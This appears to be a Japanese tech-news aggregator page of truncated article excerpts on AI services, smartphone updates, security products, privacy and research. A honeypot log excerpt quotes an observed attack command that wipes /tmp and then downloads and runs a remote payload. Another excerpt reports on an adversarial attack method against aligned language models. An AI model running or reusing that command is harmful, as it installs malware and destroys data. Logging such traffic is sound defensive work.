印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます AI insideは8月2日、新たな生成AIサービス「Heylix(ヘイリックス)」を発表した。同社のAIソリューションを活用し、業務の自律化を目指すSaaSをクローズドベータ版として8月3日から提供する。使用料は1000トークンあたり10円の従量課金制だという。 8月2日に実施した説明会では、AI inside 代表取締役社長CEO(最高経営責任者)の渡久地択氏が、「タスクを実行するBuddyが生成した結果から、別のBuddyを追加することも可能。マルチモーダルで動作し、『AnyData』のフォーキャストモデルを自然言語で取り出せる」とHeylixの概要を説明した。 同社は6月に、日本語大規模言語モデル(LLM)サービスの「PolyS
まずは、任意後見制度がどういう内容なのか改めて確認していきましょう。 ※1:法務省|成年後見制度 ※2:厚生労働省|任意後見制度とは 任意後見制度とは成年後見制度の1つ任意後見制度は、成年後見制度のうちの1つです。成年後見制度とは、認知症などにより判断能力の低下した人がさまざまな手続きを行う際に、支援する制度のこと。 成年後見制度には、「法定後見制度」と「任意後見制度」がありますが、自分の判断能力があるうちに後見人と依頼内容を決めて契約しておく制度が、任意後見制度です。 任意後見契約を締結した後に本人の判断能力が低下した場合には、家庭裁判所が任意後見監督人を専任し、監督人の監督を受けながら任意後見人があらかじめ契約した内容を行ってくれます。 任意後見制度は、自分の意思で後見人になる人や後見人にお願いしたい内容を決められるため、認知症などで判断能力が低下した後も、自分らしい生活が送れることが
カーネギーメロン大などの研究者らは、大規模言語モデルの解釈を意図的に狂わせる手法を発見し、手法の詳細を公開しました。 こうした攻撃手法が明らかにされる意義は、AIの脆弱性を共有し、より強固で安全なモデルの開発を推進するためです。 参照論文情報 タイトル:Universal and Transferable Adversarial Attacks on Aligned Language Models 著者:Andy Zou, Zifan Wang, J. Zico Kolter, Matt Fredrikson 所属:カーネギーメロン大など URL:https://doi.org/10.48550/arXiv.2307.15043 GitHub:https://github.com/llm-attacks/llm-attacks 関連研究 AIが生成したテキストが事実なのか確認する手法「Fa
Google Pixel デバイス用「Google 接続サービス」アプリにアプリバージョン v64(V64 prod (18323 sdk34))アップデート配信 VPN 接続信頼性や起動時間、電力消費、データ転送とその遅延時間などを改善 「Google 接続サービス」アプリは Wi-Fi などのネットワーク接続を改善するためのシステムアプリ 主に Google Pixel デバイス向けのシステムアプリ「Google 接続サービス」アプリに対し、2023 年 8 月 2 日(水)前後にアプリバージョン v64(V64 prod (18323 sdk34))アップデートが配信開始されました。 今回の「Google 接続サービス」アプリ v64 アップデートでは、VPN 接続信頼性や起動時間、電力消費、データ転送とその遅延時間など、主に VPN(Virtual Private Network)
マルチクラウド、ハイブリッドクラウドが当たり前の時代、脅威も変わりつつあり、セキュリティ対策も変えていかなければならない。クラウド時代のセキュリティベンダーとして、オンプレからクラウドまでを保護する機能を「CrowdStrike Falcon Platform」としてクラウドベースで提供するのが、クラウドストライクだ。 6月21日に開催した「EnterpriseZine Day 2023 Summer」で、クラウドストライクのRegional Sales Engineerを務める川上貴史氏が、Falconの特徴や優位性について説明した。 6つの柱をもつ「CrowdStrike Falcon プラットフォーム」とは 最初に川上氏はクラウドストライクについて紹介した。同社は、かつてMcAfeeでCTOを務めていたジョージ・カーツ(George Kurtz)氏が2011年に立ち上げたセキュリティ
X(旧Twitter)に代わる新アプリとも呼ばれるThreadsを始める利点やプライバシーの問題などについて議論します。 Metaのマーク・ザッカーバーグ氏が、X(旧Twitter)の対抗馬としてThreadsを立ち上げました。この新しいSNSのプライバシーについて詳しく解説します。 Threads とは?その仕組みは? Threadsは、完全に独立したSNSではありません。厳密には、 Instagramのアカウントを使ってログインをするテキストベースのアプリで、InstagramがないとThreads の機能を使用することはできません。 Threadsのアプリ自体は、驚くほどX(旧Twitter)に似ています。2つのアプリを並べて、X(旧Twitter)のアイコンやMetaのくねくねした靴紐を画面から消すと、見分けがつきません。 Threadsに投稿されたコンテンツは、Threadsアプ
昨今、「生成AI」のサービスが多くのメディアで取り上げられるようになり、個人での利用にとどまらず、企業としての利用やビジネスへの取り込みも含めその可能性が大きな話題となっています。しかしその一方で生成AIを利用する企業においては、生成AIにより発生するリスクについても十分に検討する必要があります。 本記事では、生成AIの登場により想定されるセキュリティ面でのリスクを取り上げるとともに、それらに対する対応策について考察いたします。 ▶「DX時代のソフトウェア開発手法」を読む 生成AIとは 読者の皆様の中には生成AIという言葉に聞き馴染みがない方もいらっしゃるかもしれません。しかし、「ChatGPT」というサービス名を目にした、もしくは耳にしたことがあるという方は多いのではないでしょうか。 生成AIはガートナー社によると「コンテンツやモノについてデータから学習し、それを使用して創造的かつ現実的
そのため、女性は乳がんスクリーニング検診やマンモグラフィーを年に1回受けることが推奨されている。こうした検診で乳がんを早期に発見できれば、治療が最も大きな効果を発揮するからだ。そして今、人工知能(AI)がこうした検診をサポートしてくれる可能性が出てきた。 臨床試験で、40〜80歳(中央値54歳)の女性8万人を対象としたランダム化比較試験が行われ、その結果が学術誌「The Lancet Oncology」に掲載された。この試験の目的は、マンモグラフィー読影におけるAIの有効性を、放射線科医による標準的な読影と比較することだ。 この試験を行うために、研究への参加を希望した女性たちは、スウェーデンにある4つのスクリーニング検診が可能な施設で、AIを活用した読影とAIを活用しない標準的な二重読影(1つの画像を2人の医師がチェックする方式)のどちらかに、1対1の比率で割り当てられた。つまり、半数はA
米OpenAIは、Webサイト管理者が同社のWebクローラー「GPTBot」によるサイトのデータ収集を回避する方法を紹介した。紹介する文書に日付はないが、米AI専用オンラインメディアMaginativeなどが8月7日(現地時間)、文書を見つけて報じた。 GPTBotは、同社のAIモデルをトレーニングするために公開データを収集するためのWebクローラー。OpenAIはこの文書で、GPTBotのクローリングをブロックする手順を説明している。 Webオーナーがrobots.txtにGPTBotを追加したり、IPアドレスを直接ブロックしたりしないと、ユーザーがWebサイトに入力するデータを含むWebサイトのデータがAIモデルのトレーニングデータとして収集される。 ブロックしなくても、ペイウォールアクセスを必要とするソース、個人を特定できる情報を収集することが知られているソース、ポリシーに違反するテ
プラネックスコミュニケーションズは8月3日、遠隔地の情報をリアルタイムでチェックできる「どこでもセンサー」シリーズの新モデルを発表、8月4日に販売を開始する。ラインアップは気温/湿度/気圧の測定が可能な環境センサー「WS-USB03-THP」と、人や動物の接近を検知できる人感センサー「WS-USB04-PIR」の2製品を用意した。価格はオープン、予想実売価格はともに5980円だ(税込み)。 USBメモリサイズの小型筐体を採用したセンサーユニットで、USBバスパワー駆動により単体で動作が可能。計測したデータはWi-Fi経由でクラウドに保存できる他、あらかじめ設定した値(環境センサーは気温/湿度/気圧の数値が上回る/下回る場合、人感センサーは検知の回数)になるとメールで通知することも可能だ。 旧モデルからクラウドでのデータ保存期間を改善しているのも特徴で、環境センサーのWS-USB03-THP
2023 年 8 月 7 日(月)、「Pixel 4a」「Pixel 4a(5G)」「Pixel 5」「Pixel 5a(5G)」「Pixel 6」「Pixel 6 Pro」「Pixel 6a」「Pixel 7」「Pixel 7 Pro」「Pixel 7a」に 2023 年 8 月の月次ソフトウェアアップデート配信 2023 年 7 月に引き続き今回のアップデートも Android セキュリティパッチレベルの更新のみ 新機能はもちろん、特に不具合修正も行われず Google は 2023 年 8 月 7 日(月)、Google Pixel スマートフォン「Pixel 4a」「Pixel 4a(5G)」「Pixel 5」「Pixel 5a(5G)」「Pixel 6」「Pixel 6 Pro」「Pixel 6a」「Pixel 7」「Pixel 7 Pro」「Pixel 7a」の計 10 機種に
Zoomが利用規約に盛り込んだ「ユーザーのコンテンツをAIや機械学習のトレーニングに用いることもある」という一文が反発を受けたため、Zoomが利用規約変更に関する意図を明らかにし、「ユーザーの同意なしに用いることはない」との文を追加しました。 How Zoom’s terms of service and practices apply to AI features | Zoom Blog https://blog.zoom.us/zooms-term-service-ai/ Zoom Changes TOS to Say It Won't Train AI on Your Calls 'Without Your Consent' After Backlash https://www.vice.com/en/article/wxjgvy/zoom-changes-tos-to-say-it
中国企業による生成AI(人工知能)技術の開発が活発化している。市場規模も年率数倍での成長が予測される。中国のデジタル事情に詳しい野村総合研究所(NRI)の未来創発センター戦略企画室でエキスパートコンサルタントを務める李 智慧 氏がこのほど、中国での生成AIの現状と課題、中国政府の政策と規制方針などを紹介した。日本企業が中国発の生成AIを活用する日が来るのだろうか。 中国では、アリババや百度といった大手のほか、政府系の研究機関や大学、スタートアップ企業が生成AI(人工知能)技術の開発を加速させている(図1)。米OpenAIが開発するAIチャットサービス「ChatGPT」に近い性能に到達しているともいう。 その背景には、米中ハイテク競争が激化する中で、中国国内での開発を強化せざるを得ない状況に追い込まれていることがある。中国のデジタル産業や先端企業を調査している野村総合研究所(NRI)未来創発
『MarkeZine』が主催するマーケティング・イベント『MarkeZine Day』『MarkeZine Academy』『MarkeZine プレミアムセミナー』の 最新情報をはじめ、様々なイベント情報をまとめてご紹介します。 MarkeZine Day
本日、Googleはサポートされている Pixel スマートフォン向けに2023年8月のアップデートを展開したことを発表しました。対象となっているPixelスマートフォンは、Pixel 4a、 4a(5G)、5、5a、6、6 Pro、6a、7、7 Pro、7a、Foldとなっています。 今回のアップデートはメジャーアップデートではないため新機能の追加などもなく、主にセキュリティの問題を修正するセキュリティパッチの展開です。そのため、Android 14の到来を期待していた人には残念なお知らせかもしれません。 2023年8月のPixel デバイス アップデートには、バグ修正と改善が含まれており、8月1日付けで39件、8月5日付けで9件の問題が修正されています。主な問題の修正と改善は次のとおりです。 Bluetooth Bluetooth キーボードが接続できない場合がある問題を修正 (Pix
1979年生まれ。京都府出身。高校卒業にアメリカへ留学。アリゾナ州立大学を中退後、日本食材のデリバリーサービスを現地で起業。起業した会社を売却後、帰国し2008年からローム株式会社の欧米営業本部で営業に従事した。2014年に独立により株式会社WorldLink & Companyを設立し代表取締役社長に就任。現在に至る。 2014年8月1日、京都府京都市で「世界中の素晴らしい商品やサービスを繋ぐ事により人々がより豊かな暮らしをする事」を事業目的として法人設立。2015年からはドローン事業をスタートさせ「SkyLink Japan」ブランドを誕生させる。近年は、ドローンの販売だけでなく空撮やインフラ点検、測量、農業など幅広い分野でソリューションを提供。 2018年9月には株式会社GeoLink Japanを設立し、地理的情報の活用による世の中のあらゆるアセットのデータ管理や有効活用のサービス
「100年先もつづく、農業を」というメッセージを掲げ、農薬や化学肥料不使用で栽培された農産物の販売を行っている。提携農業者の約8割が新規就農者。少量不安定な生産でも品質が高ければ適正な価格で販売できる仕組みを構築することで、環境負荷の小さい農業を実践する農業者の増加を目指す。東南アジアの山間地域で高品質なコーヒーを栽培することで森林保全と所得確保の両立を目指す「海ノ向こうコーヒー」も展開。ベンチャーキャピタルなどからの累計約19億円の資金調達を実施。農業分野を代表するソーシャルベンチャーとして事業成長を続けている。京都市「1000年を紡ぐ企業」、経済産業省「地域未来牽引企業」「J-Startup KANSAI」など、受賞多数。 パートナーとコミュニケーションを取りながら国内外の農業の流通基盤を整える ――株式会社坂ノ途中様のカンパニープロフィールと、現在までの事業内容についてお聞かせくださ
米国立聴覚・伝達障害研究所(NIDCD)によると、発話障害は一般的な障害で、米国の成人およそ1790万人が過去1年間に発話で問題を経験したことがあると申告しているという。 患者が発話障害に対処して全体的な生活の質を高めるには、言語療法士のような専門家に相談できることが不可欠だ。 Better Speechは、子どもと成人に言語療法を提供するオンラインプロバイダーで、言葉の遅れや発声障害、失語症、吃音などを自宅にいながら治療できるようにしている。 そのBetter Speechから、生成人工知能(AI)を活用した言語療法アシスタント「Jessica」が誕生した。同社では、Jessicaが言語療法の費用を抑え、さらに受けやすいものにしてくれると期待している。 Jessicaは、AIアルゴリズムを利用し、各患者のニーズに合わせてパーソナライズされた治療を施す。 Better Speechのプレス
他人のスマートフォンにこっそりインストールすることで通話履歴やSMSメッセージなどを収集するストーカーアプリの「LetMeSpy」が、外部からのハッキングを受けてユーザーや開発者の情報が流出した上に、サーバー上のデータも削除されたことで活動停止に追い込まれました。 Spyware maker LetMeSpy shuts down after hacker deletes server data | TechCrunch https://techcrunch.com/2023/08/05/letmespy-spyware-shuts-down-wiped-server/ LetMeSpyはAndroidスマートフォン用のストーカーアプリであり、公式ウェブサイトから標的のスマートフォンにインストールすることで、通話履歴・SMSの通信内容・位置情報などの個人情報を24時間収集することができまし
米Googleは8月7日(現地時間)、AndroidおよびPixelの月例セキュリティ情報の8月版を公開した。Pixel 4a以降のPixelシリーズでは、幾つかのバグ修正も行われる。 なお、Pixel 4aのセキュリティ更新はこれが最後になる可能性がある(サポートページを参照のこと)。 セキュリティ関連は、Android全体では「致命的」4件を含む48件の、Pixelでは5件の脆弱(ぜいじゃく)性が修正される。Androidの致命的脆弱性の1つは、リモートでコードが実行される可能性のあるというものだ。 この更新は、Wear OS 3.5を実行しているサポートされているすべてのPixel WatchでもOTAで利用可能になる。 Pixelの更新では、以下の問題の修正も行われる。 Pixel FoldとPixel TabletでBluetoothキーボードが接続できない場合がある問題 Pix
Clearlab の皆さん Image credit: Clearlab エンタープライズ AI で使用される大規模言語モデル(LLM)向けのデータキュレーションソリューションを提供するスタートアップ Cleanlab は20日、500万米ドルのシード資金を確保したと発表した。このラウンドは Bain Capital Ventures がリードしたもので、機械学習(ML)分野を悩ませている「ダーティデータ問題」を解消するというCleanlabのミッションに大きな信任を得たことになる。 Curtis Northcutt 氏、Jonas Mueller 氏、Anish Athalye 氏によって設立されたこのスタートアップは、データの不正確なラベルを識別、理解、クリーニングするオープンソース製品を開発した。このユニークなアプローチは、データの質の低さによって阻害されがちな ML モデルの有効性
コンテンツブロックが有効であることを検知しました。 このサイトを利用するには、コンテンツブロック機能(広告ブロック機能を持つ拡張機能等)を無効にしてページを再読み込みしてください。 ✕
はじめに Turing株式会社の自動運転MLチームでエンジニアをしている越智 (@chizu_potato)と塩塚 (@shiboutyoshoku) です。 Turingが目指す自動運転は、大量のデータで学習された非常に賢い機械学習モデルを活用することです。そのために、走行パートナーの方たちと協力して創業時からこれまで大量の走行データを取得してきました。走行データは車両に取り付けられた複数カメラによる360度をカバーした動画と、そのときの速度やGPSなどの走行ログを含んでいます。データサイズは80TBを超え、時間換算で3500時間程度です。 これだけのデータサイズでモデルを学習するためには、1枚のGPUだけで頑張るには限界があり複数のGPU (multi-GPU) による分散並列学習が必要となってきます。しかし、ただ分散並列学習を行うだけではmulti-GPUに対し、データの入出力 (I
LayerX で機械学習エンジニアとして働いている松村 @yu-ya4 です。現在はMLチームにて、バクラクシリーズのAI-OCR機能の開発をはじめとした機械学習技術の活用を推進しています。7月はLayerXエンジニアブログを活発にしよう月間 とのことですのでブログを執筆しております。今日は誰がなんと言おうと7/26です。 今回は、2023年5月にプレビューとなり先月から今月にかけてGAとなったVertex AI PaLM APIを触ってみたので紹介します。なお、このブログを執筆している2023年7月26日時点では英語やスペイン語など5つの言語への対応のみがGAであり、日本語は対応しておりませんのでご注意ください。最新のリリース情報については以下のリリースノートなどをご参照ください。 PaLM自体は日本語を含む多数の言語からなるデータセットで学習されているので入力を受け付けること自体は問題
急速に進化するゲームの世界では、技術の進歩が没入型体験の限界を押し広げ続けており、ゲーム業界の大手企業であるSonyは最近、アイトラッキング(視線追跡)技術に関する画期的な特許で話題になりました。 このイノベーションは、プレーヤーがビデオゲームに向き合う方法に革命をもたらし、よりパーソナライズされたダイナミックなゲーム体験を提供することを約束します。この記事では、Sonyのアイトラッキング特許の詳細、その潜在的な可能性、そしてそれがゲームの未来をどのように形作るのかを詳しく掘り下げていきます。 画像: alf.melin「Eye macro with reflection」 アイトラッキングテクノロジーの台頭 Sonyの革新的な特許を詳しく調べる前に、視線追跡技術の概念を理解することが重要です。研究者や開発者は何年にもわたってその可能性を探求してきました。例えば、私達は10年以上にわたって
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます サイバーエージェントは、和製生成AI開発とデジタル広告の機械学習基盤に「Dell PowerEdge XE9680」サーバーを採用した。デル・テクノロジーズが7月31日に発表した。 サイバーエージェントは、2016年から広告事業領域においてAIの研究開発を積極的に行っている。2020年には効果予測AIで広告効果を最大化する「極予測AI」の提供を開始。その当時、最新の「NVIDIA A100 GPU」が登場したことを機に、独自の機械学習基盤のためのデータセンターで運用するGPUサーバーとして同GPUを搭載した「Dell PowerEdge XE8545」を採用していた。 その後、同社は130億パラメーターからなる、独自の日本語大規模言語モ
用語「フューショット学習」について説明。ChatGPTなどの言語モデルが少数の例文から効率的に学習し、多様なタスクを解決できることを指す。大量データが必要な一般的な機械学習や既存モデルの再学習(ファインチューニング)と比べ手軽。また、コンピュータビジョンなど他の機械学習分野でも、少量データから学習する同じ用語が使用されている。 連載目次 用語解説 自然言語処理においてフューショット学習(Few-shot Learning)とは、ファインチューニングなどによる言語モデルのパラメーター(=ニューラルネットワークの重みなど)のアップデートなしに、少数の例文(Examples、見本:Examplars)を文脈(コンテキスト)内でデモンストレーションとして提示するだけで、さまざまなタスクを解決できる能力を持つことである。2022年末以降で話題となっているChatGPTやGoogle Bardなどに搭
カメラ好き機械学習エンジニアの@yktm31です。 先日、以下のように、ChatGPTのCode Interpreterを用いて、画像データを加工する記事を書きました。 その際は、リサイズや画像の切り抜きなど、基本的な加工ができることを確認しました。 今回は、画像編集ソフトで行うような、より高度な画像処理を実施してみたいと思います。 acro-engineer.hatenablog.com 利用する画像は前回記事と同様、以前撮影した富士山の写真を使いたいと思います。 画像処理/加工 今回、以下のような画像処理/加工を実施してみました。 ガンマ補正を適用し画像を明るくする CLAHEを適用しコントラストを調整する シャープネスを向上させる ノイズ除去を適用する ガンマ補正を適用し画像を明るくする ガンマ補正は、画像の明るさを非線形に調整するための手法です。 一番単純に画像を明るくする方法は、
CPUに潜む脆弱性に対して、より安全性が高く低遅延で実現する手法をNTTと東北大学電気通信研究所、ドイツ Ruhr University Bochum, CASA の共同研究により開発したことが発表された。 2018年に公開されたCPUの脆弱性「Spectre(スペクター)」や「Meltdown(メルトダウン)」は、CPUのアーキテクチャにかかわるハードウェアレベルの脆弱性で、CPUのキャッシュを悪用した「Contention型キャッシュ攻撃」と呼ばれている。 CPUには1度アクセスしたデータをCPU内のキャッシュメモリーに配置することで、メモリーへアクセスするより高速に参照できることで、より効率的な処理を可能にしている。ところが、このキャッシュメモリーに配置した情報を悪用する攻撃方法が発見されたことで、対策する必要が生じたわけだ。 ただハードウェアレベルの脆弱性を解決することは難しく、O
さまざまな業界でDXが進む一方、次世代のウェブを象徴する「Web3」という概念が広がってきました。Web3は、ブロックチェーン技術を活用することでデータが分散化され、セキュリティが向上すると考えられています。企業がAIを導入して課題解決を図っていく流れはまだまだ発展途上ですが、Web3によって何が変わっていくのでしょうか。直野廉氏(株式会社エクサウィザーズ Robot企画グループAIコンサルタント ビジネスディベロップメントリード)と、川西亮輔氏(株式会社エクサウィザーズ Robot AIグループロボットエンジニア)に引き続き伺いました。 編集部:御社は、「マルチモーダルなロボットAIソリューション」を展開していますが、マルチモーダルとは何ですか? 直野氏:マルチモーダルとは、複数のさまざまな種類のデータを元に、次の判断をするということです。人間は五感を得て次に何するかを考えますよね。それ
Google、「Google マイ アクティビティ」にて米国で提供している「あなたに関する検索結果(Results about you)」に新機能として警告機能を追加 電話番号 / 自宅住所 / メールアドレスを含む検索結果が見つかった場合に知らせてくれる機能 まずは米国英語環境で提供 Google は 2023 年 8 月 3 日(木)、ユーザー自身の検索履歴や回覧した WEB サイトが保存されるマイページ「Google マイ アクティビティ」の、現在米国で提供している「あなたに関する検索結果(Results about you)」に、新機能を追加すると発表しました。 そもそも「あなたに関する検索結果(Results about you)」は、ユーザー自身の電話番号 / 自宅住所 / メールアドレスの、いわゆる個人情報を含む検索結果が見つかった場合に、その個人情報の検索結果からの削除を
ハニーポット(仮) 観測記録 2023/08/03分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP NetGear製品の脆弱性を狙うアクセス curlによるスキャン行為 .jsへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 WordPressへのスキャン行為 を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget testbots.maizhangyu.top/jaws; sh /tmp/jaws Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス .jsへのスキャン行為 /.gitへのスキャン行為 UserAgentがH
連載第一回目となる今回は、CNCFのプロジェクトに関する説明と、Keycloakとそのコミュニティとの最新動向を紹介します。 Keycloakとは、ID管理・アクセス管理(IAM:Identity and Access Management)のOSSであり、WebアプリケーションおよびAPI・マイクロサービスの認証や認可をKeycloakに任せることができます。前回の連載ではKeycloakのAPI認可のユースケースを紹介しました。それ以降のKeycloakに関するトピックとして、2023年4月にKeycloakはCloud Native Computing Foundation(以下、CNCF)のIncubatingプロジェクトとして承認されたことが挙げられます。これにより、IAM分野のOSSとして定番になっていくことが期待されます。また、その過程でKeycloakやコミュニティにも大き
アメリカとイスラエルの大学の研究者が「ビデオベースの暗号解析」の手法について論文を発表しました。この概念は、論文と同様、簡単に理解できるものではありませんが、いつものように、ここでは皆さんにわかりやすい言葉で説明します。 ビデオベースの暗号解析攻撃 この技術を使った実際の攻撃は、次のようなシナリオが想定されます。まず侵入者が、オフィスビル内のビデオ監視システムへの不正アクセスに成功します。1 台のカメラは、機密文書などを保管するセキュリティが厳重な保管室のドアに向けられています。ドアにはスマートカードリーダーが備えられていて、従業員がドアに近づき、カードを挿入すると、ロックが開くようになっています。 スマートカードには、カードリーダーと通信するマイクロチップが埋め込まれています。スマートカードにエンコードされたキーとリーダー内のデータを照合するため、リーダーは、暗号化アルゴリズム、つまり一
ゼンリンデータコム、スマート工場支援サービスにIoT/AI遠隔点検サービスを連携して販売:製造ITニュース ゼンリンデータコムは、同社の「スマートファクトリーサービス」と、LiLzのIoT、AI遠隔点検サービス「LiLz Gauge」を連携して販売する。ユーザー企業における検針、点検業務の効率化などの課題を解決していく。 ゼンリンデータコムは2023年7月6日、同社の「スマートファクトリーサービス」と、LiLzのIoT(モノのインターネット)、AI(人工知能)遠隔点検サービス「LiLz Gauge」を連携して販売していくと発表した。ゼンリンデータコムはLiLzの販売パートナーとしてLiLz Gaugeを再販する。 スマートファクトリーサービスは、高精度の位置情報や製造現場からのデジタルデータを活用して生産工程の状況を可視化。ボトルネックを解消するなど、生産活動を継続的に支援する。LiLz
『MarkeZine』が主催するマーケティング・イベント『MarkeZine Day』『MarkeZine Academy』『MarkeZine プレミアムセミナー』の 最新情報をはじめ、様々なイベント情報をまとめてご紹介します。 MarkeZine Day
はじめに 複数の省庁からメール関連システムへの不正アクセスによる情報漏えいについて被害公表がなされていますが、報道やSNS上では、どの製品の脆弱性が原因なのか明かされないことへの疑問などが指摘されています。悪用された脆弱性に関する情報の被害公表時の取り扱いは、サイバー攻撃被害に係る情報の共有・公表ガイダンス[1]検討会(事務局:NISC、警察庁、総務省、経済産業省、JPCERT/CC)で議論され、同ガイダンスにて示されています。あらためて、個別の被害公表時の扱い方と、複数組織がいる場合の全体のコーディネーションについて解説します。 ※なお、公表のあった事案の詳細は不明ですが、現時点において関連する被害公表がなされた事案について弊センターは関与していないため、本稿については個別のインシデント対応に係る守秘義務契約等になんら影響するものではない点を記しておきます。 原因となった製品の脆弱性に関
WebブラウザやWebフロントエンドの技術は日々進化しており、Webページの表現はどんどん多彩なものになり、同時に実装がどんどん複雑になっている。この進化に合わせるように、フロントエンドの脆弱性も増加しており、実装を誤って攻撃を許してしまう例が増えている。フロントエンドエンジニアは、複雑になる実装に追随しながら、脆弱性にも気を配らなければならなくなっている。しかし脆弱性にもさまざまな種類があり、すべてを漏らさず把握し、的確な対策を打つことはかなり難しい。このセッションでは、サイボウズ株式会社New Business Divisionの副部長であり、同社でフロントエンドエンジニアとして活躍している平野昌士氏が、Webアプリケーションをようやく作れるようになった若手エンジニアを想定して、フロントエンドに多い脆弱性の仕組みとその対策について解説した。 セキュリティ強度を高めるためにHTTPはHT
ChatGPTは、多くのユーザー、特にミレニアル世代にとって人気のある生産性ツールとなっている。しかし人工知能(AI)という話題に対する関心が高まるにつれ、AIのセキュリティと信用性に対する懸念も高まる。ユーザーらはChatGPTについて、この2つの点と信頼度が最大の弱点だと見ている。 消費者インサイトの調査を手がけるHundredXは、人気のある70以上の生産性ツールに関して5万件以上のフィードバックから分かったユーザー体験とChatGPTのユーザー経験を比較して分析した。比較対象となった生産性ツールには「DocuSign」「Microsoft Office」「Zoom」「Google Workspace」「Adobe」「Slack」などがある。 他の生産性ソフトウェアと比較すると、ChatGPTは信頼性とセキュリティにおいて否定的に捉えられており、ユーザーからは、「あまりにも簡単に剽窃
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く